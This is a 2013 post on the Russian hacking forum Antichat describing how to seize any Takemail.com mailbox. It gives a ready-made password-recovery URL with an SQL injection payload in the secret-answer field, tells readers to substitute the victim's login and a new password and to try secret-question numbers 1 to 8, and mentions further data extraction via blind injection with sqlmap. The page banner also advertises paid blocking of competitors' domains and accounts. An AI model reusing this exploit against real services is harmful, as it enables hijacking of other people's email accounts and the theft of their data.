Уязвимость в Takemail.com позволяющая сменить пароль на любой почте.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Уязвимость в Takemail.com позволяющая сменить пароль на любой почте.

Опции темы

Поиск в этой теме

Опции просмотра

08.12.2013, 04:02

psihoz26

Постоянный

Регистрация: 22.11.2010

Сообщений: 545

С нами: 8142806

Репутация: 324

Для смены пароля нужно перейти по ссылке ниже предварительно подставив нужные переменные.

Код:

http://takemail.com/takemail/services/recover.cgi?step=1&action=recover&login_recover=[ЛОГИН]%40takemail.com&mail_secretanswer=qwerty'+union+select+1+--+&mail_secretquestion=1&password1=[НОВЫЙ ПАРОЛЬ]&password2=[НОВЫЙ ПАРОЛЬ]

Если вы увидите ошибку говорящую вам о том что не верен ответ на секретный вопрос то вам нужно поменять номер вопроса

Для этого меняем mail_secretquestion=* в ссылке

Всего их 8 (от 1 до 8)

Как многие поняли тут ещё sql иньекция.

Курится через boolean based blind, например скульмапом но оченьмедленно и криво =\

𝕏 Twitter Reddit Telegram Копировать ссылку